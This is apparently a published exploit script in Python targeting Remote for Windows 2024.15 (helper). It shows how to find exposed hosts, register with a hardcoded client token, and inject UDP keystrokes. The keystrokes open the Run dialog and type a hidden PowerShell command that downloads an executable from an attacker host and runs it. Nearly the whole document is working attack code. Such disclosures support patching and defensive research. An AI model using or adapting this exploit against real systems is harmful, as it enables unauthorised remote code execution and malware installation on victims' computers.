# Exploit Title: Remote for Windows 2024.15 (helper) - RCE V2
# Date: 2025-06-13
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

#!/usr/bin/env python3
'''
Remote for Windows 2024.15 (helper) - RCE V2
this rce works when the "ask to grant access for unknown iOS devices" in
settings is unchecked

# Identification:
nmap -p- -T4 <target> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

#!/usr/bin/env python3

import requests
from scapy.all import IP, UDP, send, Raw
import socket
import time
import urllib3
import struct
urllib3.disable_warnings()


target = "192.168.8.105"
port = 49718
lhost = "192.168.8.100"
payload = "shell.exe"

cmd_string = f"cmd /c powershell -nop -w hidden -c
\"$p='C:\\Windows\\Temp\\s.exe';Invoke-WebRequest -Uri http://{lhost}/{payload}
-OutFile $p;Start-Process $p\""



def send_udp_packet(data):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(data, (target, port))
    sock.close()

def send_keycode_keyboard_event(keycode, is_down, is_extended=False):
    flags = 0
    if is_down:
        flags |= 1
    if is_extended:
        flags |= 128

    packet = struct.pack("<IHB", 0x00020007, keycode, flags)
    send_udp_packet(packet)

def send_unicode_keyboard_event(char_code):

    packet = struct.pack("<IH", 0x00030006, char_code)
    send_udp_packet(packet)


print("[*] Authenticating/Registering IP via HTTPS...")
try:

    requests.get(f"https://{target}:{port}/api/authenticate",
                headers={"X-ClientToken":"blue0x1"},
                verify=False,
                timeout=5)
    print("[+] Authentication/Registration request sent successfully.")
except requests.exceptions.RequestException as e:
    print(f"[-] Error during authentication/registration: {e}")
    print("    (This step is crucial for UDP input to be processed. Check
target availability and port.)")
    exit()

time.sleep(2)


print("[*] Sending Win+R to open Run dialog...")

send_keycode_keyboard_event(0x5B, True)  # Win key down
send_keycode_keyboard_event(0x52, True)  # R key down
time.sleep(0.1)
send_keycode_keyboard_event(0x5B, False) # Win key up
send_keycode_keyboard_event(0x52, False) # R key up

time.sleep(0.5)

print(f"[*] Typing payload: \"{cmd_string}\"...")
for char in cmd_string:
    send_unicode_keyboard_event(ord(char))
    time.sleep(0.05)

time.sleep(1)

print("[*] Executing payload (pressing Enter)...")

send_keycode_keyboard_event(0x0D, True)   # Enter key down
time.sleep(0.05)
send_keycode_keyboard_event(0x0D, False)  # Enter key up

print("[+] Execution complete. Check target machine for payload execution.")